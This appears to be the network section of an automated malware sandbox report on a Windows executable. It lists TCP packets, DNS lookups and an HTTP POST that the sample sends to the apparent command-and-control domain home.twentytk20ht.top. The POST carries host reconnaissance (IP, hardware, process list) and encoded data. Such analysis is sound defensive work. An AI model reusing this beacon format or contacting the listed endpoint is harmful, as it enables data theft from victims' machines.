                                                            Dec 20, 2024 16:19:56.552541018 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.552551031 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.552568913 CET4970280192.168.2.10185.121.15.192
                                                            Dec 20, 2024 16:19:56.552581072 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.552597046 CET4970280192.168.2.10185.121.15.192
                                                            Dec 20, 2024 16:19:56.552609921 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.552618980 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.552627087 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.552639008 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.552649021 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.552675962 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.552719116 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.552880049 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.552891970 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.553085089 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.553162098 CET4970280192.168.2.10185.121.15.192
                                                            Dec 20, 2024 16:19:56.553257942 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.553319931 CET4970280192.168.2.10185.121.15.192
                                                            Dec 20, 2024 16:19:56.553369045 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.553379059 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.553386927 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.553411961 CET4970280192.168.2.10185.121.15.192
                                                            Dec 20, 2024 16:19:56.553440094 CET4970280192.168.2.10185.121.15.192
                                                            Dec 20, 2024 16:19:56.553493977 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.553505898 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.553515911 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.553527117 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.553538084 CET4970280192.168.2.10185.121.15.192
                                                            Dec 20, 2024 16:19:56.553570032 CET4970280192.168.2.10185.121.15.192
                                                            Dec 20, 2024 16:19:56.553594112 CET4970280192.168.2.10185.121.15.192
                                                            Dec 20, 2024 16:19:56.553612947 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.553622007 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.553630114 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.553657055 CET4970280192.168.2.10185.121.15.192
                                                            Dec 20, 2024 16:19:56.553682089 CET4970280192.168.2.10185.121.15.192
                                                            Dec 20, 2024 16:19:56.553814888 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.553864956 CET4970280192.168.2.10185.121.15.192
                                                            Dec 20, 2024 16:19:56.554049015 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.554059029 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.554066896 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.554078102 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.554089069 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.554117918 CET4970280192.168.2.10185.121.15.192
                                                            Dec 20, 2024 16:19:56.554207087 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.554214954 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.554332972 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.554342985 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.554352045 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.554362059 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.554617882 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.554627895 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.554636002 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.554645061 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.554655075 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.554802895 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.554812908 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.671499968 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.671513081 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.671601057 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.671611071 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.671619892 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.671760082 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.671770096 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.671778917 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.671788931 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.671801090 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.671874046 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.671884060 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.672060013 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.672070026 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.672077894 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.672117949 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.672175884 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.672185898 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.672291994 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.672303915 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.672314882 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.672629118 CET4970280192.168.2.10185.121.15.192
                                                            Dec 20, 2024 16:19:56.672700882 CET4970280192.168.2.10185.121.15.192
                                                            Dec 20, 2024 16:19:56.672924995 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.672990084 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.673172951 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.673182011 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.673234940 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.673243999 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.673285007 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.673368931 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.673378944 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.673398018 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.673458099 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.673552990 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.673563004 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.673607111 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.673616886 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.673664093 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.673675060 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.673746109 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.673788071 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.673798084 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.673877001 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.673922062 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.673974037 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.674086094 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.674097061 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.674220085 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.674304008 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.674453020 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.674463987 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.674794912 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.674804926 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.674813986 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.674823999 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.674833059 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.675205946 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.675215960 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.675224066 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.675235033 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.676307917 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.676553965 CET4970280192.168.2.10185.121.15.192
                                                            Dec 20, 2024 16:19:56.676616907 CET4970280192.168.2.10185.121.15.192
                                                            Dec 20, 2024 16:19:56.719567060 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.720022917 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.720114946 CET4970280192.168.2.10185.121.15.192
                                                            Dec 20, 2024 16:19:56.720369101 CET4970280192.168.2.10185.121.15.192
                                                            Dec 20, 2024 16:19:56.792572975 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.792588949 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.792599916 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.792609930 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.792705059 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.792714119 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.792831898 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.792843103 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.792982101 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.792992115 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.793000937 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.793011904 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.793083906 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.793138027 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.793148994 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.793232918 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.793246984 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.793256044 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.793318987 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.793329954 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.793395042 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.793406010 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.793415070 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.793426991 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.793530941 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.793543100 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.793551922 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.793589115 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.793598890 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.793786049 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.793795109 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.793803930 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.793812990 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.793823004 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.793881893 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.793900967 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.793910980 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.793919086 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.794044971 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.794054985 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.794064045 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.794071913 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.794080973 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.794531107 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.794540882 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.794553041 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.794564009 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.794573069 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.794583082 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.794590950 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.794600964 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.794622898 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.794646025 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.794656038 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.796314955 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.796390057 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.796400070 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.796410084 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.796531916 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.796540976 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.796577930 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.796587944 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.796741009 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.796756983 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.796827078 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.796837091 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.796902895 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.796914101 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.797018051 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.797029018 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.797066927 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.797142029 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.797153950 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.797261953 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.797277927 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.797296047 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.797306061 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.797313929 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.797378063 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.797395945 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.797497988 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.797508001 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.798319101 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.798330069 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.798341990 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.798352003 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.798360109 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.798371077 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.798381090 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.798388958 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.798398972 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.798408031 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.798420906 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.798432112 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.798440933 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.798453093 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.798465967 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.798474073 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.798490047 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.798499107 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.798508883 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.798517942 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.798528910 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.798537970 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.798547029 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.798557043 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.798567057 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.798583031 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.840270042 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.841492891 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:58.055304050 CET4970380192.168.2.10185.121.15.192
                                                            Dec 20, 2024 16:19:58.179075003 CET8049703185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:58.179181099 CET4970380192.168.2.10185.121.15.192
                                                            Dec 20, 2024 16:19:58.179685116 CET4970380192.168.2.10185.121.15.192
                                                            Dec 20, 2024 16:19:58.299308062 CET8049703185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:59.464418888 CET8049703185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:59.464839935 CET8049703185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:59.464900017 CET4970380192.168.2.10185.121.15.192
                                                            Dec 20, 2024 16:19:59.465178967 CET4970380192.168.2.10185.121.15.192
                                                            Dec 20, 2024 16:19:59.584779978 CET8049703185.121.15.192192.168.2.10

                                                            UDP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Dec 20, 2024 16:19:51.688673019 CET6367153192.168.2.101.1.1.1
                                                            Dec 20, 2024 16:19:51.688751936 CET6367153192.168.2.101.1.1.1
                                                            Dec 20, 2024 16:19:51.826662064 CET53636711.1.1.1192.168.2.10
                                                            Dec 20, 2024 16:19:51.993133068 CET53636711.1.1.1192.168.2.10
                                                            Dec 20, 2024 16:19:55.185672998 CET6367453192.168.2.101.1.1.1
                                                            Dec 20, 2024 16:19:55.185746908 CET6367453192.168.2.101.1.1.1
                                                            Dec 20, 2024 16:19:55.324074030 CET53636741.1.1.1192.168.2.10
                                                            Dec 20, 2024 16:19:55.324095964 CET53636741.1.1.1192.168.2.10
                                                            Dec 20, 2024 16:19:57.915903091 CET6367653192.168.2.101.1.1.1
                                                            Dec 20, 2024 16:19:57.916066885 CET6367653192.168.2.101.1.1.1
                                                            Dec 20, 2024 16:19:58.053770065 CET53636761.1.1.1192.168.2.10
                                                            Dec 20, 2024 16:19:58.054269075 CET53636761.1.1.1192.168.2.10

                                                            DNS Queries

                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                            Dec 20, 2024 16:19:51.688673019 CET192.168.2.101.1.1.10x2faeStandard query (0)httpbin.orgA (IP address)IN (0x0001)false
                                                            Dec 20, 2024 16:19:51.688751936 CET192.168.2.101.1.1.10xc382Standard query (0)httpbin.org28IN (0x0001)false
                                                            Dec 20, 2024 16:19:55.185672998 CET192.168.2.101.1.1.10xa7a3Standard query (0)home.twentytk20ht.topA (IP address)IN (0x0001)false
                                                            Dec 20, 2024 16:19:55.185746908 CET192.168.2.101.1.1.10xcc62Standard query (0)home.twentytk20ht.top28IN (0x0001)false
                                                            Dec 20, 2024 16:19:57.915903091 CET192.168.2.101.1.1.10xe515Standard query (0)home.twentytk20ht.topA (IP address)IN (0x0001)false
                                                            Dec 20, 2024 16:19:57.916066885 CET192.168.2.101.1.1.10x7c5cStandard query (0)home.twentytk20ht.top28IN (0x0001)false

                                                            DNS Answers

                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                            Dec 20, 2024 16:19:51.993133068 CET1.1.1.1192.168.2.100x2faeNo error (0)httpbin.org34.226.108.155A (IP address)IN (0x0001)false
                                                            Dec 20, 2024 16:19:51.993133068 CET1.1.1.1192.168.2.100x2faeNo error (0)httpbin.org98.85.100.80A (IP address)IN (0x0001)false
                                                            Dec 20, 2024 16:19:55.324095964 CET1.1.1.1192.168.2.100xa7a3No error (0)home.twentytk20ht.top185.121.15.192A (IP address)IN (0x0001)false
                                                            Dec 20, 2024 16:19:58.053770065 CET1.1.1.1192.168.2.100xe515No error (0)home.twentytk20ht.top185.121.15.192A (IP address)IN (0x0001)false

                                                            HTTP Request Dependency Graph

                                                            • httpbin.org
                                                            • home.twentytk20ht.top

                                                            HTTP Packets

                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            0192.168.2.1049702185.121.15.192807928C:\Users\user\Desktop\5Jat5RkD3a.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 20, 2024 16:19:55.446743965 CET12360OUTPOST /TQIuuaqjNpwYjtUvFojm1734579850 HTTP/1.1
                                                            Host: home.twentytk20ht.top
                                                            Accept: */*
                                                            Content-Type: application/json
                                                            Content-Length: 504728
                                                            Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 34 37 30 37 39 39 33 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 [TRUNCATED]
                                                            Data Ascii: { "ip": "8.46.123.189", "current_time": "1734707993", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 38, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 324 }, { "name": "csrss.exe", "pid": 408 }, { "name": "wininit.exe", "pid": 484 }, { "name": "csrss.exe", "pid": 492 }, { "name": "winlogon.exe", "pid": 552 }, { "name": "services.exe", "pid": 620 }, { "name": "lsass.exe", "pid": 628 }, { "name": "svchost.exe", "pid": 752 }, { "name": "fontdrvhost.exe", "pid": 776 }, { "name": "fontdrvhost.exe", "pid": 784 }, { "name": "svchost.exe", "pid": 872 }, { "name": "svchost.exe", "pid": 924 }, { "name": "dwm.exe", "pid": 984 }, { "name": "svchost.exe", "pid": 360 }, { "name": "svchost.exe", "pid": 356 }, { "name": "svchost.exe", "pid": 772 }, { "name": "svchost.exe", "pid": [TRUNCATED]
                                                            Dec 20, 2024 16:19:55.566643000 CET4944OUTData Raw: 53 35 4c 62 67 2b 5a 48 5c 2f 5a 63 64 79 34 4a 43 58 73 4a 32 75 76 6c 5c 2f 69 50 39 6b 66 55 44 35 6b 5c 2f 67 48 78 78 6f 32 75 63 53 4e 46 6f 6e 69 32 44 5c 2f 68 44 4e 5a 6c 66 4f 36 4b 33 74 4e 51 6b 75 74 55 38 49 7a 4b 71 5a 52 37 37 56
                                                            Data Ascii: S5Lbg+ZH\/Zcdy4JCXsJ2uvl\/iP9kfUD5k\/gHxxo2ucSNFoni2D\/hDNZlfO6K3tNQkutU8IzKqZR77V\/EXhsSSKGWyjEgSPzck8ZOCs0ahiK+PyOU2vZ\/21hYUqMl1nPF4GvmGCw0ErNzxmJw6trryy5fez7wC8QsljKeGw+W8Rwpq9X\/V\/GVK1eL+zCngczwuV5hi6ktVGGBwmKldWaTlHm+O6K7nxl8M\/iB8PniHj
                                                            Dec 20, 2024 16:19:55.566699028 CET2472OUTData Raw: 6e 5c 2f 41 43 61 4d 5c 2f 76 4e 37 70 49 6a 35 74 5c 2f 4e 75 50 2b 57 47 4f 5c 2f 38 41 58 5c 2f 50 46 47 31 48 33 37 45 2b 53 33 5c 2f 36 5a 65 66 7a 65 63 6a 5c 2f 50 34 30 2b 54 66 77 37 2b 59 6e 6c 78 66 36 75 4f 58 5c 2f 55 5c 2f 35 5c 2f
                                                            Data Ascii: n\/ACaM\/vN7pIj5t\/NuP+WGO\/8AX\/PFG1H37E+S3\/6Zefzecj\/P40+Tfw7+Ynlxf6uOX\/U\/5\/zmgBjL+7fy3\/1cRl8v\/nt\/iP8A9VMkk+ZEfy0\/8j+T9OPU1MzeZ86ZTp\/rM\/56fhQH8tYtnmfu4seZ\/wBMPtX+f5+poOgrfxJvT5P+WqSfv4Prdfl+H6UN\/rIX\/wBcf+Wsnbj\/AD+tPjCRtv2SIlx+9
